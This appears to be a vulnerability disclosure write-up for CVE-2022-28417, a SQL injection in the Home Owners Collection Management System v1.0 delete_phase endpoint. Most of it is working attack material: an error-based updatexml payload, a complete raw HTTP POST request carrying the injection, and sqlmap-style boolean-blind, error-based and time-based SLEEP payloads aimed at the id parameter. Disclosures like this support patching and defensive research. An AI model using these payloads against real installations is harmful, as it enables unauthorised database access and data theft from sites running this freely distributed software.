Headline
CVE-2022-28417: bug_report/SQLi-4.md at main · k0xx11/bug_report
Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_phase.
Permalink
Cannot retrieve contributors at this time
Home Owners Collection Management System has SQL injection vulnerability
vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
Vulnerability file: /hocms/classes/Master.php?f=delete_phase
Vulnerability location: /hocms/classes/Master.php?f=delete_phase,id
[+]Payload: id=1’ and updatexml(1,concat(0x7e,(select version()),0x7e),0)–+ //id is Injection point
POST /hocms/classes/Master.php?f=delete_phase HTTP/1.1
Host: 192.168.1.19
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/hocms/admin/?page=phases
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
Connection: close
id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
— Parameter: id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1’ RLIKE (SELECT (CASE WHEN (3093=3093) THEN 1 ELSE 0x28 END))-- TVaW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1’ AND (SELECT 9655 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(9655=9655,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rFkx
Type: time\-based blind
Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
Payload: id\=1' AND (SELECT 5645 FROM (SELECT(SLEEP(5)))IsZT)-- rkXc
—